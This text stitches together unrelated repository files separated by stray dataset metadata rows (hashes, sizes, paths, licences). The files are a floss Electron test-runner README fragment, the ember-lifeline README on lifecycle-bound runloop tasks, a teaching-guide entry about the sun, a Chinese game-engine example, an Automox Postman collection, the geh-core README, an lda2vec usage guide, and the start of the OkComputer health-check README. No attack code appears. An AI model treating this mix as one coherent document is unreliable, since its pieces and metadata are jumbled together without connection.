Some applications may require a specific version of Electron. Floss uses Electron 10.0.0+, but you can specify the path to your own version. The custom version can be used either through the commandline argument `--electron`, by setting the Node environment variable `ELECTRON_PATH`, or by setting the run option `electron`.

```bash
floss --path "test/*.js" \
    --electron /usr/local/bin/electron
```

```bash
ELECTRON_PATH=/usr/local/bin/electron floss --path "test/*.js"
```

## GitHub Actions Integration

```yml
name: Node.js CI
on:
  push:
    branches: [ '**' ]
    tags: [ '**' ]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
    - uses: actions/checkout@v2
    - uses: actions/setup-node@v1
      with:
        node-version: '12'
    - run: npm install
    - uses: GabrielBB/xvfb-action@v1.0
      with:
        run: npm test
```
352
0.681988
eng_Latn
0.912317
6f695fd3d50318f0ee141c37631092355624fa45
21,153
md
Markdown
frontend/node_modules/ember-lifeline/README.md
sahilpaudel/AfterGlow
0859ec14b47c8c5704cc8e5cba86d39aa258fff5
[ "MIT" ]
null
null
null
frontend/node_modules/ember-lifeline/README.md
sahilpaudel/AfterGlow
0859ec14b47c8c5704cc8e5cba86d39aa258fff5
[ "MIT" ]
null
null
null
frontend/node_modules/ember-lifeline/README.md
sahilpaudel/AfterGlow
0859ec14b47c8c5704cc8e5cba86d39aa258fff5
[ "MIT" ]
null
null
null
# ember-lifeline [![Build Status](https://travis-ci.org/rwjblue/ember-lifeline.svg?branch=master)](https://travis-ci.org/rwjblue/ember-lifeline) [![Ember Observer Score](https://emberobserver.com/badges/ember-lifeline.svg)](https://emberobserver.com/addons/ember-lifeline) [![npm version](https://badge.fury.io/js/ember-lifeline.svg)](https://badge.fury.io/js/ember-lifeline) Ember applications have long life-cycles. A user may navigate to several pages and use many different features before they leave the application. This makes JavaScript and Ember development unlike Rails development, where the lifecycle of a request is short and the environment disposed of after each request. It makes Ember development much more like iOS or video game development than traditional server-side web development. It is good to note that this isn't something inherent to just Ember. Any single-page app framework or solution (Angular, React, Vue, Backbone...) must deal this lifecycles of objects, and specifically with how async tasks can be bounded by a lifecycle. There is a fantastic Ember addon, [ember-concurrency](http://ember-concurrency.com/) that solves these problems in a very exciting and simple way. It is largely inspired by [RxJS](http://reactivex.io/) and the Observable pattern, both of which concern themselves with creating life-cycle-free async that, in practice, tend to be hard for developers to learn. This addon introduces several utility methods to help manage async, object lifecycles, and the Ember runloop. These tools should provide a simple developer experience that allows engineers to focus on the business domain, and think less about the weird parts of working in a long-lived app. 
## Installation

    ember install ember-lifeline

To use any of the below-mentioned methods in your component, route or service, you will have to import and apply one or more of these mixins to your class:

* `ember-lifeline/mixins/run` for using any of the `*Task` methods
* `ember-lifeline/mixins/dom` for using `addEventListener`
* `ember-lifeline/mixins/disposable` for using `registerDisposable` and `runDisposable`

## Usage

### `runTask`

**tl;dr Call `this.runTask(fn, timeout)` on any component, route, or service to schedule work.**

Use `runTask` where you might use `setTimeout`, `setInterval`, or `Ember.run.later`. `runTask` will handle three common issues with the above APIs.

First, *`setTimeout` and `setInterval` do not use the runloop*. Ember uses a [work queuing mechanism called the runloop](https://guides.emberjs.com/v2.5.0/applications/run-loop/). In order for the queues to flush without autoruns (a feature that helps devs be lazy in development but is disabled in tests and harms performance), a runloop must be added around a callstack. For example:

```js
import Ember from 'ember';

const { Component, run } = Ember;

export default Component.extend({
  init() {
    this._super();
    window.setTimeout(() => {
      run(() => {
        this.set('date', new Date());
      });
    }, 500);
  }
});
```

There are [several ways to add runloops in the Ember API docs](http://emberjs.com/api/classes/Ember.run.html), but regardless it is less than ideal to need to remember and reason about this. Often `Ember.run.later` is used instead of `setTimeout` for this reason. However, that still has issues.

Second, *none of `setTimeout`, `setInterval` or `Ember.run.later` bind the timeout to the lifecycle of the context object*. If the example above is re-written to use `Ember.run.later`...
```js
import Ember from 'ember';

const { Component, run } = Ember;

export default Component.extend({
  init() {
    this._super();
    run.later(() => {
      this.set('date', new Date());
    }, 500);
  }
});
```

**We're still making a dangerous assumption that this component instance still exists 500ms from now**. In practice, especially with tests, objects scheduling timers may be destroyed by the time the timer fires. This causes a number of unexpected errors. To fix this, the codebase is littered with checks for `isDestroyed` state on objects retained after destruction:

```js
import Ember from 'ember';

const { Component, run } = Ember;

export default Component.extend({
  init() {
    this._super();
    run.later(() => {
      // First, check if this object is even valid
      if (this.isDestroyed) { return; }
      this.set('date', new Date());
    }, 500);
  }
});
```

The code above is correct, but again, less than simple to write. Instead, always use `runTask`. `runTask` entangles a timer with the lifecycle of the object scheduling the work. When the object is destroyed, the task is also cancelled.

Using `runTask`, the above can be written as:

```js
import Ember from 'ember';
import RunMixin from 'ember-lifeline/mixins/run';

const { Component } = Ember;

export default Component.extend(RunMixin, {
  init() {
    this._super();
    this.runTask(() => {
      this.set('date', new Date());
    }, 500);
  }
});
```

And there is no need to worry about cancellation or the `isDestroyed` status of the object itself.

### `scheduleTask`

**tl;dr Call `this.scheduleTask(queueName, fnOrMethodName, args*)` on any component, route, or service to schedule work on the run loop.**

Use `scheduleTask` where you might use `Ember.run.schedule`. Like `runTask`, `scheduleTask` avoids common pitfalls of deferred work. *`Ember.run.schedule` does not bind the scheduled work to the lifecycle of the context object*.
```js
import Ember from 'ember';

const { Component, run } = Ember;

export default Component.extend({
  init() {
    this._super();
    run.schedule('sync', this, () => {
      this.set('date', new Date());
    });
  }
});
```

There's a chance that objects scheduling work may be destroyed by the time the queue is flushed. Leaving behavior to chance invites flakiness. This manifests as a number of unexpected errors. Fixing this issue requires checks for `isDestroyed` state on objects retained after destruction:

```js
import Ember from 'ember';

const { Component, run } = Ember;

export default Component.extend({
  init() {
    this._super();
    run.schedule('sync', this, () => {
      // First, check if this object is even valid
      if (this.isDestroyed) { return; }
      this.set('date', new Date());
    });
  }
});
```

The code above is correct, but less than ideal. Instead, always use `scheduleTask`. `scheduleTask` entangles a scheduled task with the lifecycle of the object scheduling the work. When the object is destroyed, the task is also cancelled.

Using `scheduleTask`, the above can be written as:

```js
import Ember from 'ember';
import RunMixin from 'ember-lifeline/mixins/run';

const { Component } = Ember;

export default Component.extend(RunMixin, {
  init() {
    this._super();
    this.scheduleTask('sync', () => {
      this.set('date', new Date());
    });
  }
});
```

#### A word about the `afterRender` queue

Scheduling work on the `afterRender` queue has well-known, negative performance implications. Therefore, *`scheduleTask` is prohibited from scheduling work on the `afterRender` queue.*

### `debounceTask`

**tl;dr Call `this.debounceTask(methodName, args*, wait, immediate)` on any component, route, or service to debounce work.**

Debouncing is a common async pattern often used to manage user input. When a task is debounced with a timeout of 100ms, it first schedules the work for 100ms later.
Then, if the same task is debounced again with (again) a timeout of 100ms, the first timer is cancelled and a new one made for 100ms after the second debounce request. If no request to debounce that task is made for 100ms, the task executes. Here is a good blog post about debounce and throttle patterns: [jQuery throttle / debounce: Sometimes, less is more!](http://benalman.com/projects/jquery-throttle-debounce-plugin/)

Debouncing is a pattern for managing scheduled work over time, and so it falls prey to some of the same faults as `setTimeout`. Again, Ember provides `Ember.run.debounce` to handle the runloop aspect, but does not provide a simple solution for cancelling work when the object is destroyed. Enter `debounceTask`.

For example, no matter how quickly you click on this component, it will only report the time if you have stopped clicking for 500ms:

```js
import Ember from 'ember';
import RunMixin from 'ember-lifeline/mixins/run';

const { Component } = Ember;

export default Component.extend(RunMixin, {
  click() {
    this.debounceTask('reportTime', 500);
  },
  reportTime() {
    this.set('time', new Date());
  }
});
```

However, if the component is destroyed, any pending debounce task will be cancelled.

### `throttleTask`

**tl;dr Call `this.throttleTask(methodName, args*, spacing, immediate)` on any component, route, or service to throttle work.**

When a task is throttled, it is executed immediately. For the length of the timeout, additional throttle calls are ignored. Again, like debounce, throttle falls prey to many issues shared by `setTimeout`, though fewer since the work itself is always run immediately.
Regardless, even just for consistency, the API of `throttleTask` is presented:

```js
import Ember from 'ember';
import RunMixin from 'ember-lifeline/mixins/run';

const { Component } = Ember;

export default Component.extend(RunMixin, {
  click() {
    this.throttleTask('reportTime', 500);
  },
  reportTime() {
    this.set('time', new Date());
  }
});
```

In this example, the first click will update `time`, but clicks after that for 500ms will be disregarded. Then, the next click will fire and start a timeout window of its own.

Often it is desired to pass additional arguments to the throttle callback. We also need to reference the same function in order for throttling to work. In order to achieve this, it is recommended to make use of instance variables. This enables the throttle function to use the arguments in the state they are in at the time the callback is executed:

```js
import Ember from 'ember';
import RunMixin from 'ember-lifeline/mixins/run';

const { Component } = Ember;

export default Component.extend(RunMixin, {
  click(evt) {
    this._evt = evt;
    this.throttleTask('updateClickedEl', 500);
  },
  updateClickedEl() {
    this.set('lastClickedEl', this._evt.target);
    this._evt = null;
  }
});
```

### `pollTask`

**tl;dr call `this.pollTask(fn, label)` on any component, route, or service to setup polling.**

Use `pollTask` where you might reach for recursive `this.runTask(fn, ms)`, `Ember.run.later`, `setTimeout`, and/or `setInterval`.

Using recursive `runTask` or `run.later` invocations causes tests to pause forever. This is due to the fact that the Ember testing helpers automatically wait for all scheduled tasks in the run loop to finish before resuming execution in the normal test context.

And as a reminder, *`setInterval` should never be used*. Say you `setInterval(fn, 20);`. Regardless of how long `fn` takes, a new call will be scheduled every 20ms.
For example, if `fn` took 80ms to run (not uncommon), then *four* new `fn` calls would be in the browser's event queue waiting to fire immediately. This causes memory issues (the queue may never flush) and performance problems. Instead, you should be scheduling new work *after* the previous work was done. For example:

```js
import Component from 'ember-component';
import RunMixin from 'ember-lifeline/mixins/run';

export default Component.extend(RunMixin, {
  init() {
    this._super(...arguments);
    this.updateTime();
  },
  updateTime() {
    this.set('date', new Date());
    this.runTask(() => this.updateTime(), 20);
  }
});
```

In this way the true delay between setting `date` is `20ms + time the rendering took`. However, more work is still needed, since when used in an acceptance test, the snippet above will cause the test to never complete.

To avoid this testing "freezing" behavior, we would need to update the component to have different behavior when testing than when running in normal development / production. Typically, this is done something like:

```js
import Ember from 'ember';
import Component from 'ember-component';
import RunMixin from 'ember-lifeline/mixins/run';

export default Component.extend(RunMixin, {
  init() {
    this._super(...arguments);
    this.updateTime();
  },
  updateTime() {
    this.set('date', new Date());

    if (!Ember.testing) {
      this.runTask(() => this.updateTime(), 20);
    }
  }
});
```

Unfortunately, this makes it very difficult to actually test that the polling is happening, and oftentimes the polling behavior is itself either fundamental to the object's purpose or difficult enough to warrant its own tests. This is where `pollTask` really shines.
You could rewrite the above example to use `pollTask` like this:

```js
import Component from 'ember-component';
import injectService from 'ember-service/inject';
import RunMixin from 'ember-lifeline/mixins/run';

export default Component.extend(RunMixin, {
  time: injectService(),

  init() {
    this._super(...arguments);
    this.pollTask('updateTime', 'updating-time#updateTime');
  },

  updateTime(next) {
    let time = this.get('time');
    this.set('date', time.now());

    this.runTask(next, 20);
  }
});
```

In development and production, the `updateTime` method is executed initially during the component's `init` and then recursively called every 20ms after its processing finishes. When the component is destroyed (e.g. no longer rendered on screen), any pending timers from `runTask` or `debounceTask` calls are properly canceled (as usual with those methods).

In testing, the `updateTime` method would execute initially during the component's instantiation (just like in development and production environments), but would not automatically start polling. This allows tests that are not related to the polling behavior to continue uninterrupted.
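The contract described above (no new iteration is scheduled until the previous one explicitly invokes `next`) can be sketched framework-free. This is only an illustration of the idea, not ember-lifeline's implementation; `makePoller` and the injectable `schedule` function are assumptions made here so the behavior can be driven without real timers:

```js
// Sketch of the pollTask contract: the polled function receives a `next`
// callback, and nothing recurs until `next` is invoked. The scheduler is
// injected so iterations can be driven (or withheld) manually, as in tests.
function makePoller(fn, schedule) {
  let cancelled = false;
  const tick = () => {
    if (cancelled) {
      return; // mirrors lifecycle teardown: no work after destruction
    }
    fn(() => schedule(tick));
  };
  return {
    start: tick,
    cancel() {
      cancelled = true;
    }
  };
}
```

Driving the poller with a manual queue in place of `schedule` makes the "poll only when asked" behavior explicit, much like `pollTaskFor` does in tests.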
To test the actual polling functionality, use the provided `pollTaskFor` helper:

```js
import moduleForComponent from 'ember-lifeline/tests/helpers/module-for-component';
import wait from 'ember-test-helpers/wait';
import { pollTaskFor } from 'ember-lifeline/mixins/run';
import Service from 'ember-service';

let fakeNow;

moduleForComponent('updating-time', {
  integration: true,

  beforeEach() {
    this.register('service:time', Service.extend({
      now() {
        return fakeNow;
      }
    }));
  }
});

test('updating-time updates', function(assert) {
  fakeNow = new Date(2016);

  this.render(hbs`
    {{#updating-time as |time|}}
      {{time}}
    {{/updating-time}}
  `);

  assert.equal(this.$().text().trim(), fakeNow);

  return wait()
    .then(() => {
      fakeNow = new Date(2017);
      pollTaskFor('updating-time#updateTime');

      return wait();
    })
    .then(() => {
      assert.equal(this.$().text().trim(), fakeNow);
    });
});
```

A couple of helpful assertions are provided with the `pollTask` functionality:

* A given `label` can only be used once. If the same `label` is used a second time, an error will be thrown.
* If nothing has been queued for the given label, calling `pollTaskFor(label)` will trigger an error.

### `registerDisposable`

**tl;dr call `this.registerDisposable(fn)` on any component, route, or service to register a function you want to run when the object is destroyed.**

Use `registerDisposable` as a replacement for explicitly disposing of any externally managed resources. A disposable is a function that disposes of resources that are outside of Ember's lifecycle. This essentially means you can register a function that you want to run to automatically tear down any resources when the Ember object is destroyed.

Example: it's common to see code written to explicitly unbind event handlers from external libraries.
```js
// app/components/foo-bar.js
import Ember from 'ember';
import DisposableMixin from 'ember-lifeline/mixins/disposable';
import DOMish from 'some-external-library';

const { run } = Ember;

export default Component.extend(DisposableMixin, {
  init() {
    this._super(...arguments);
    this.DOMish = new DOMish();

    this.bindEvents();
  },

  willDestroy() {
    this.unbindEvents();
  },

  bindEvents() {
    this.DOMish.on('foo', run.bind(this, this.respondToDOMEvent));
  },

  unbindEvents() {
    this.DOMish.off('foo');
  },

  respondToDOMEvent() {
    // do something
  }
});
```

This not only adds verbosity to code, but also requires that you symmetrically tear down any bindings you set up. By utilizing the `registerDisposable` API, `ember-lifeline` will ensure your registered disposable function will run when the object is destroyed.

```js
// app/components/foo-bar.js
import Ember from 'ember';
import DisposableMixin from 'ember-lifeline/mixins/disposable';
import DOMish from 'some-external-library';

const { run } = Ember;

export default Component.extend(DisposableMixin, {
  init() {
    this._super(...arguments);
    this.DOMish = new DOMish();

    this.bindEvents();
  },

  bindEvents() {
    let onFoo = run.bind(this, this.respondToDOMEvent);
    this.DOMish.on('foo', onFoo);

    this.domFooToken = this.registerDisposable(() => this.DOMish.off('foo', onFoo));
  },

  respondToDOMEvent() {
    // do something
  }
});
```

The `registerDisposable` method returns a `disposable`, which is an object with the following interface:

```ts
interface IDisposable {
  dispose: function;
  disposed: boolean;
}
```

You can explicitly run the disposable without waiting for the object's destruction:

```js
// app/components/foo-bar.js
import DOMish from 'some-external-library';
import DisposableMixin from 'ember-lifeline/mixins/disposable';
import Ember from 'ember';

const { run } = Ember;

export default Component.extend(DisposableMixin, {
  init() {
    this._super(...arguments);
    this.DOMish = new DOMish();

    this.bindEvents();
  },

  bindEvents() {
    let onFoo = run.bind(this, this.respondToDOMEvent);
    this.DOMish.on('foo', onFoo);

    this.domFooDisposable = this.registerDisposable(() => this.DOMish.off('foo', onFoo));
  },

  respondToDOMEvent() {
    // do something
  },

  actions: {
    cancelDOM() {
      this.domFooDisposable.dispose();
    }
  }
});
```

### `addEventListener`

**tl;dr call `this.addEventListener(element, eventName, fn, options)` on a component or route to add a jQuery event listener that will be automatically removed when the component is un-rendered.**

Event listeners pose similar but different challenges. They likewise must have a runloop added around their callback, and are pinned to an object's lifecycle, in this case to the detachment of that component from the DOM (`willDestroyElement`). For example, this is an idiomatic and correct way to add an event listener to the window in Ember:

```js
import Ember from 'ember';

const { Component, run } = Ember;

export default Component.extend({
  didInsertElement() {
    this._super();
    $(window).on(`scroll.${this.elementId}`, (e) => {
      run(() => {
        this.set('windowScrollOffset', e.clientY);
      });
    });
  },

  willDestroyElement() {
    $(window).off(`scroll.${this.elementId}`);

    this._super();
  }
});
```

This verbosity, and the need to do so many things right by hand, is very unfortunate. With `addEventListener` the above example can be re-written as:

```js
import Ember from 'ember';
import DomMixin from 'ember-lifeline/mixins/dom';

const { Component } = Ember;

export default Component.extend(DomMixin, {
  didInsertElement() {
    this._super();
    this.addEventListener(window, 'scroll', (e) => {
      this.set('windowScrollOffset', e.clientY);
    });
  }
});
```

`addEventListener` will provide the runloop and automatically remove the listener when `willDestroyElement` is called.
`addEventListener` provides several ways to specify an element:

```js
// Attach to an element inside this component
this.addEventListener('.someClass', 'scroll', fn);

// Attach to a jQuery list
this.addEventListener(this.$('.someClass'), 'scroll', fn);

// Any jQuery list, even those outside the component
this.addEventListener($('.someClass'), 'scroll', fn);

// Attach to a DOM node
this.addEventListener(document.body, 'click', fn);

// Attach to window
this.addEventListener(window, 'scroll', fn);
```

### `removeEventListener`

**tl;dr call `this.removeEventListener(element, eventName, fn, options)` on a component or route to actively remove a jQuery event listener previously added by a call to `addEventListener`.**

Although any listener added by a call to `addEventListener` will be torn down when the route or component is being destroyed, there might be cases where you want to actively remove an existing event listener even during the active lifecycle, for example when temporarily dealing with high-volume events like `scroll` or `mousemove`.

Be sure to pass the identical arguments used when calling `addEventListener`!

## Credit

This addon was developed internally at Twitch, written originally by [@mixonic](https://github.com/mixonic) and [@rwjblue](https://github.com/rwjblue).

The name `ember-lifeline` was suggested by [@nathanhammond](https://github.com/nathanhammond).
30.790393
343
0.722073
eng_Latn
0.988062
6f69b49179be9c5d0519c0f14989fbf5c370b8ac
1,547
md
Markdown
content/curriculum/guides/2005/4/05.04.06.x.md
kenlu89/teachers_institute
1fc993f30d6ac17b3097e63510ce758a12c910ea
[ "MIT" ]
null
null
null
content/curriculum/guides/2005/4/05.04.06.x.md
kenlu89/teachers_institute
1fc993f30d6ac17b3097e63510ce758a12c910ea
[ "MIT" ]
null
null
null
content/curriculum/guides/2005/4/05.04.06.x.md
kenlu89/teachers_institute
1fc993f30d6ac17b3097e63510ce758a12c910ea
[ "MIT" ]
null
null
null
---
layout: "unit"
title: "Guide Entry 05.04.06"
path: "/curriculum/guides/2005/4/05.04.06.x.html"
unitTitle: "The Sun in Our Lives"
unitAuthor: "Roberta A. Mazzucco"
keywords: ""
recommendedFor: "Recommended for Science, grades 2-5."
---

<body>
<hr/>
<h4>Guide Entry to 05.04.06:</h4>
<p>This unit was written to be used in a third grade classroom, but can easily be adapted for use in a second, fourth, or fifth grade. The unit deals with the sun and how it affects life on earth. The unit does not include any serious discussion of the individual nine planets. Its focus is the sun and the development of our solar system and the universe. It is organized around a set of questions, from "Where did the sun and planets come from?" and "What is the anatomy of the sun?" to "How does the sun affect our weather?" and "How do we have night and day and the seasons?"</p>
<p>The unit offers a set of hands-on experiments and demonstrations. There is an experiment on the absorption of light and how it is affected by color, and a demonstration of the colors contained in sunlight. There is also a demonstration of how the universe is expanding and the effect this has on the galaxies, using a balloon and beads as well as a raisin cake. The unit also provides an annotated bibliography of teacher and children's books, as well as a list of some of the many astronomy sites available on the Web. There is also an appendix listing the specific science standards covered by the unit.</p>
<p>(Recommended for Science, grades 2-5.)</p>
</body>
64.458333
609
0.757595
eng_Latn
0.999861
6f69d750729b1c043d1338ee5ddec45999de759c
933
md
Markdown
projects/Node/call-all/docs/README.md
oneseedfruit/qiciengine-examples
725faff2217e806b1b2e91699bee902714f26e2e
[ "MIT" ]
1
2019-04-29T15:08:42.000Z
2019-04-29T15:08:42.000Z
projects/Node/call-all/docs/README.md
oneseedfruit/qiciengine-examples
725faff2217e806b1b2e91699bee902714f26e2e
[ "MIT" ]
null
null
null
projects/Node/call-all/docs/README.md
oneseedfruit/qiciengine-examples
725faff2217e806b1b2e91699bee902714f26e2e
[ "MIT" ]
null
null
null
# call-all

* When this example runs, clicking any Sprite node hides that node. Clicking the "Revive all" button makes all the Sprite nodes visible again. The effect looks like this:<br>
![](images/show.gif)

## UI

* Create six Sprite nodes named item1 through item6, and create an Image node named revive. The revive node's properties are set as follows:<br>
![](images/revive.png)
* Create a Text node named clue. The clue node's properties are set as follows:<br>
![](images/text.png)
* Create a script under the Scripts folder and attach it to the revive node, then drag the item1 through item6 nodes into the corresponding property, as shown below:<br>
![](images/script.png)
* The script code is as follows:<br>

```javascript
var UI = qc.defineBehaviour('qc.engine.UI', qc.Behaviour, function() {
}, {
    // Serialized fields
    items: qc.Serializer.NODES
});

// Initialization
UI.prototype.awake = function() {
    var self = this;
    self.items.forEach(function(item) {
        // Add a click listener to each item
        self.addListener(item.onClick, self.onItemClick, self);
    });
};

UI.prototype.onItemClick = function(item) {
    // Hide the clicked item
    item.visible = false;
};

// Click handler for the revive button
UI.prototype.onClick = function() {
    this.items.forEach(function(item) {
        item.visible = true;
    });
};
```
19.040816
73
0.672026
yue_Hant
0.644755
6f6a4881680c8d5f8a60f671cd865c8d1384420e
5,395
md
Markdown
_listings/automox/policies-get-postman.md
streamdata-gallery-organizations/automox
45376eefebda23d7d37ca579fcca89287f87a1d2
[ "CC-BY-3.0" ]
null
null
null
_listings/automox/policies-get-postman.md
streamdata-gallery-organizations/automox
45376eefebda23d7d37ca579fcca89287f87a1d2
[ "CC-BY-3.0" ]
null
null
null
_listings/automox/policies-get-postman.md
streamdata-gallery-organizations/automox
45376eefebda23d7d37ca579fcca89287f87a1d2
[ "CC-BY-3.0" ]
null
null
null
{ "info": { "name": "Automox Get Policies", "_postman_id": "fb2ef5a0-ff50-4d9a-a4d7-26fb81c8d423", "description": "Gets all `Policy` objects for authenticated user", "schema": "https://schema.getpostman.com/json/collection/v2.0.0/" }, "item": [ { "name": "Events", "item": [ { "id": "a3420d12-e727-4340-b8e3-bba536194d54", "name": "gets-all-event-objects-for-the-authenticated-user", "request": { "url": "http://console.automox.com/api/events", "method": "GET", "header": [ { "key": "Accept", "value": "*/*", "disabled": false } ], "body": { "mode": "raw" }, "description": "Gets all `Event` objects for the authenticated user." }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "514405f0-5625-4bd8-9861-37631e9f40d5" } ] }, { "id": "0f788f5f-6df5-4cba-b549-82f6510c87ab", "name": "gets-a-specific-event-object-for-the-authenticated-user", "request": { "url": { "protocol": "http", "host": "console.automox.com", "path": [ "api", "events/:id" ], "variable": [ { "id": "id", "value": "{}", "type": "string" } ] }, "method": "GET", "header": [ { "key": "Accept", "value": "*/*", "disabled": false } ], "body": { "mode": "raw" }, "description": "Gets a specific `Event` object for the authenticated user." 
}, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "ea42ced1-96f3-487b-a6d7-dfb82d2772d0" } ] } ] }, { "name": "Orgs", "item": [ { "id": "cf6069a1-3123-4aa4-939a-a1af2c2a04ec", "name": "gets-all-organizations-for-the-api-key", "request": { "url": "http://console.automox.com/api/orgs", "method": "GET", "header": [ { "key": "Accept", "value": "*/*", "disabled": false } ], "body": { "mode": "raw" }, "description": "Gets all organizations for the api key" }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "d8820d08-f7ed-40b7-b6b3-105863d0b90a" } ] }, { "id": "7b1e132b-9c75-44a4-a835-655baded8590", "name": "returns-all-software-packages-discovered-on-all-servers-endpoints-of-an-organization", "request": { "url": { "protocol": "http", "host": "console.automox.com", "path": [ "api", "orgs/:id/packages" ], "variable": [ { "id": "id", "value": "{}", "type": "string" } ] }, "method": "GET", "header": [ { "key": "Accept", "value": "*/*", "disabled": false } ], "body": { "mode": "raw" }, "description": "Returns all software packages discovered on all servers (endpoints) of an organization" }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "66172c47-0772-4466-9535-1e4297597224" } ] } ] }, { "name": "Policies", "item": [ { "id": "4615dc18-9d9a-48d3-9438-e5122741315a", "name": "gets-all-policy-objects-for-authenticated-user", "request": { "url": "http://console.automox.com/api/policies?o=%7B%7D", "method": "GET", "header": [ { "key": "Accept", "value": "*/*", "disabled": false } ], "body": { "mode": "raw" }, "description": "Gets all `Policy` objects for authenticated user" }, "response": [ { "status": "OK", "code": 200, "name": "Response_200", "id": "a9fc13ea-6793-41c6-aa8a-79b91ac4ce5b" } ] } ] } ] }
28.696809
116
0.344393
yue_Hant
0.156628
6f6a76e8f49cee7844a5f277409f8a54f8b57086
1,567
md
Markdown
README.md
Energinet-DataHub/geh-core
16a7a336ba4b8336812f87f15c35bfe9abd693f1
[ "Apache-2.0" ]
null
null
null
README.md
Energinet-DataHub/geh-core
16a7a336ba4b8336812f87f15c35bfe9abd693f1
[ "Apache-2.0" ]
8
2021-09-28T07:56:38.000Z
2022-03-30T12:31:10.000Z
README.md
Energinet-DataHub/geh-core
16a7a336ba4b8336812f87f15c35bfe9abd693f1
[ "Apache-2.0" ]
null
null
null
[![codecov](https://codecov.io/gh/Energinet-DataHub/geh-core/branch/main/graph/badge.svg?token=CXGH54CZ85)](https://codecov.io/gh/Energinet-DataHub/geh-core)

# Introduction

This repository is dedicated to code that will be shared between two or more domains. The shared code will be published as reusable components in the form of NuGet packages on [nuget.org](https://www.nuget.org/).

## Links

- [development.md](./documents/development.md)

## Folder Structure

Artifacts should be organized in the following folder structure:

``` txt
<root>
│   .editorconfig
│   .gitignore
│   .licenserc.json
│   codecov.yml
│   LICENSE
│   README.md
│
├───.github
│   └───actions
│   └───workflows
│
├───documents
│       development.md
│
└───source
```

### `root`

Contains:

- `.editorconfig` file for configuration of Formatting, Code Style and Analyzers (including StyleCop).
- `.gitignore` file that defines which files should be ignored (not checked in) by Git.
- `.licenserc.json` *TODO: Add a description.*
- `codecov.yml` file that contains the CodeCov configuration outlining the flags/projects where code coverage is tracked.
- `LICENSE` *TODO: Add a description.*
- `README.md` file that gives an introduction to this repository.

### `.github`

Contains GitHub workflow and action (`*.yml`) files for establishing build pipelines.

### `documents`

Contains notes and documentation stored in `*.md` files.

### `source`

Contains libraries in subfolders. For details on library organization and development, see [development.md](./documents/development.md).
27.017241
212
0.726867
eng_Latn
0.962266
6f6a8122d6359e9f80dbec0324a8d40c8b8198a4
663
md
Markdown
_posts/k8s-openstack.md
GabrielSVinha/gabrielsvinha.github.io
461f57c8ada4904da75d5135efd11c524faf87cf
[ "MIT" ]
null
null
null
_posts/k8s-openstack.md
GabrielSVinha/gabrielsvinha.github.io
461f57c8ada4904da75d5135efd11c524faf87cf
[ "MIT" ]
null
null
null
_posts/k8s-openstack.md
GabrielSVinha/gabrielsvinha.github.io
461f57c8ada4904da75d5135efd11c524faf87cf
[ "MIT" ]
null
null
null
---
title: 'Kubernetes with OpenStack Cloud Provider'
date: 2018-03-27
permalink: /posts/2018/03/k8s-openstack/
tags:
  - kubernetes
  - openstack
  - cloud
---

Kubernetes has been a buzzword in tech for a long time; this is a symptom of something with both high recommendation rates and low failure rates. Other important characteristics of Kubernetes, such as high availability, scalability, etc., can be easily proven with a few days of using the tool. In this article we want to focus on one of K8S's greatest abilities: integration.

---

Check out the full article at this [link](https://medium.com/@vinhags/kubernetes-with-openstack-cloud-provider-4768c06d7e53)
44.2
370
0.775264
eng_Latn
0.986831
6f6ada2542fa6ecc2404028e1340b3553249ec88
914
md
Markdown
lda2vec/README.md
Rochan-A/TopicModeling
d13221960ca6f63590bfcfed54df8680879f6b11
[ "MIT" ]
2
2019-01-08T14:12:41.000Z
2020-03-21T00:50:05.000Z
lda2vec/README.md
Rochan-A/TopicModeling
d13221960ca6f63590bfcfed54df8680879f6b11
[ "MIT" ]
null
null
null
lda2vec/README.md
Rochan-A/TopicModeling
d13221960ca6f63590bfcfed54df8680879f6b11
[ "MIT" ]
null
null
null
# Topic Modeling with lda2vec

### Note: Use [this](https://github.com/Rochan-A/lda2vec) forked version of lda2vec. The original version can be found [here](https://github.com/cemoody/lda2vec)

## Files

* `preprocess.py`
  Uses the tokenized output from `parse.py`, which can be found [here](https://github.com/Rochan-A/TopicModeling/blob/master/lda%26w2vec/parse.py).
  * Use either `filtered.txt` or `tokens.txt` as the input
* `lda2vec_run.py`
  Executes the model. Requires CUDA
* `lda2vec_model.py`
  lda2vec (class) model

## Usage

Generate the `corpus`, `data.npz`, `tokens` and `vocab` files.

`$ python preprocess.py -h`

```
usage: preprocess.py [-h] [-i INPUT_PATH] [-o OUTPUT_PATH]

optional arguments:
  -h, --help            show this help message and exit
  -i INPUT_PATH, --input-path INPUT_PATH
                        Path to tokenized sentences
  -o OUTPUT_PATH, --output-path OUTPUT_PATH
                        Destination for parsed and preprocessed output
```
36.56
161
0.727571
eng_Latn
0.59324
6f6be22f4a7c665be43b6899cb6120fd9aea3c28
6,932
markdown
Markdown
README.markdown
ekampp/okcomputer
8e41af50282ccfe16754574a1d67c87d80be371f
[ "MIT" ]
null
null
null
README.markdown
ekampp/okcomputer
8e41af50282ccfe16754574a1d67c87d80be371f
[ "MIT" ]
null
null
null
README.markdown
ekampp/okcomputer
8e41af50282ccfe16754574a1d67c87d80be371f
[ "MIT" ]
null
null
null
[![Code Climate](https://codeclimate.com/github/sportngin/okcomputer.svg)](https://codeclimate.com/github/sportngin/okcomputer) [![Build Status](https://travis-ci.org/sportngin/okcomputer.svg)](https://travis-ci.org/sportngin/okcomputer) [![Coverage Status](https://coveralls.io/repos/sportngin/okcomputer/badge.svg?branch=master)](https://coveralls.io/r/sportngin/okcomputer)

# OK Computer

Inspired by the ease of installing and setting up [fitter-happier] as a Rails application's health check, but frustrated by its lack of flexibility, OK Computer was born. It provides a robust endpoint to perform server health checks with a set of built-in plugins, as well as a simple interface to add your own custom checks.

For more insight into why we built this, check out [our blog post introducing OK Computer][blog].

[blog]:http://pulse.sportngin.com/news_article/show/267646?referrer_id=543230

OkComputer currently supports the following Rails versions:

* 6.0
* 5.2
* 5.1
* 4.2

#### Not using Rails?

If you use [Grape] instead of Rails, check out [okcomputer-grape].

[Grape]:https://github.com/ruby-grape/grape
[okcomputer-grape]:https://github.com/bellycard/okcomputer-grape

## Installation

Add this line to your application's Gemfile:

    gem 'okcomputer'

And then execute:

    $ bundle

Or install it yourself as:

    $ gem install okcomputer

## Usage

To perform the default checks (application running and ActiveRecord database connection), do nothing other than adding the gem to your application's Gemfile.

